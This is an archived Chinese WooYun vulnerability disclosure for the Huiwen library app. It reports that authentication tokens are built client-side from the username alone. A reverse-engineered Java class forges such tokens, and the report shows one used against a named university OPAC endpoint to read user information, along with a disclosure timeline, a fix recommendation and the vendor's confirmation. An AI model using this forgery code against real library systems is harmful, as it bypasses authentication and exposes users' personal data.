乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-01: 细节已通知厂商并且等待厂商处理中 2014-12-02: 厂商已经确认,细节仅向厂商公开 2014-12-05: 细节向第三方安全合作伙伴开放 2015-01-26: 细节向核心白帽子及相关领域专家公开 2015-02-05: 细节向普通白帽子公开 2015-02-15: 细节向实习白帽子公开 2015-03-01: 细节向公众公开
生成认证token,只用用户名即可获取用户信息
将用于认证的token的生成方式在客户端实现且生成方式与密码无关影响院校列表 http://www.libsys.com.cn/huiwen_app_center_2.php
import java.io.UnsupportedEncodingException;import java.math.BigInteger;/** * Created by snail on 14-11-23. */public class LibToken { public static String makeToken(String s) { int k, l, i1, j1, k1; String s1, s2, s3, s4, s5; StringBuffer stringBuffer; byte abyte0[] = null; try { abyte0 = s.getBytes("utf-8"); } catch (UnsupportedEncodingException e) { return null; } s1 = ""; for (l = 0; l < abyte0.length; l++) { s2 = Integer.toHexString(0xff & abyte0[l]); if (s2.length() == 1) { s1 = (new StringBuilder(String.valueOf(s1))).append("0").append(s2).toString(); } else { s1 = (new StringBuilder(String.valueOf(s1))).append(s2).toString(); } // System.out.println(l+"-->s1-->"+s1+"s2-->"+s2); } //System.out.println("s1------>"+s1); s4 = s1.toUpperCase(); stringBuffer = new StringBuffer(""); for (i1 = 0; i1 < s4.length(); i1++) { stringBuffer.append(s4.charAt(i1)); if ((i1 % 2 == 0) && (i1 != 0) && (i1 < 12)) { stringBuffer.append((int) (10D * Math.random())); } } //System.out.println("stringBuffer.toString()--->"+stringBuffer.toString()); s5 = b(stringBuffer.toString()); //System.out.println("s5--->"+s5); j1 = 0; for (k = 0; k < s5.length(); k++) { j1 += Integer.parseInt((new StringBuilder()).append(s5.charAt(k)).toString()); } //System.out.println("j1---->"+j1); k1 = j1 % 36; if ((k1 <= 10) || (k1 == 16)) k1 = 18; return (new StringBuilder(String.valueOf(a(s5, k1)))).append(a(k1)).toString(); } public static String a(String s, int k) { // System.out.println("s--->"+s+"---k-->-"+k); BigInteger bigIntegerArray[] = new BigInteger[500]; for (int l = 0; l < 100; l++) { bigIntegerArray[l] = new BigInteger("0"); } BigInteger bi, bi1, bi2; bi = new BigInteger(s); bi1 = new BigInteger(String.valueOf(k)); bi2 = bi; int i1; for (i1 = 0; bi2.toString().length() != 1 || bi2.intValue() != 0; i1++) { bigIntegerArray[i1] = bi2.mod(bi1); bi2 = bi2.subtract(bigIntegerArray[i1]).divide(bi1); } for (int j1 = i1 - 1, k1 = 0; k1 < i1 / 2; k1++, j1--) { BigInteger bi3 = bigIntegerArray[k1]; bigIntegerArray[k1] = bigIntegerArray[j1]; bigIntegerArray[j1] = bi3; } String s1 = ""; for (int l1 = 0; l1 < i1; l1++) { s1 = (new StringBuilder((String.valueOf(s1)))).append(a(Long.parseLong(bigIntegerArray[l1].toString()))).toString(); } // System.out.println("s1-->"+s1); return s1; } public static String a(long l) { if (l < 10L) { //System.out.println("a00--->"+String.valueOf(l)); return String.valueOf(l); } if (l < 36L) { //System.out.println("a11--->"+String.valueOf((char) (int) (65L + (l - 10L)))); return String.valueOf((char) (int) (65L + (l - 10L))); } else return ""; } public static String b(String s) { BigInteger bi1 = new BigInteger(String.valueOf(16)); BigInteger bi2 = new BigInteger("0"); BigInteger bi3 = bi2; for (int k = 0; k < s.length(); k++) { char c1 = s.charAt(k); int m; if ((c1 >= '0') && (c1 <= '9')) { m = Integer.parseInt(String.valueOf(c1)); } else if ((c1 >= 'A') && (c1 <= 'Z')) { m = 10 + (c1 - 'A'); } else { m = -1; } bi3 = bi3.add(bi1.pow(-1 + (s.length() - k)).multiply(new BigInteger(String.valueOf(m)))); } //System.out.println("bi3-->"+bi3.toString()); return bi3.toString(); } public static void main(String[] args){ System.out.println("token--->"+LibToken.makeToken("1114011xx,扬州大学")); }}
将生成的token用到http://opac.yzu.edu.cn:8081/m/mobile/rinfo.php?token=xxx
将token生成方式在服务器端生成 或者 token生成与密码有关
危害等级:中
漏洞Rank:9
确认时间:2014-12-02 10:08
谢谢,我们会尽快修复漏洞
暂无